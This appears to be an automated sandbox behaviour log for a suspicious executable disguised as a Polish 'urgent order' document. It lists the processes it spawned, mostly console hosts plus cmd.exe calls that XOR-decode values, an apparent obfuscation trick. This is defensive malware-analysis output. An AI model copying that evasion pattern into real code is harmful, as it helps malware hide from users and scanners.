Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
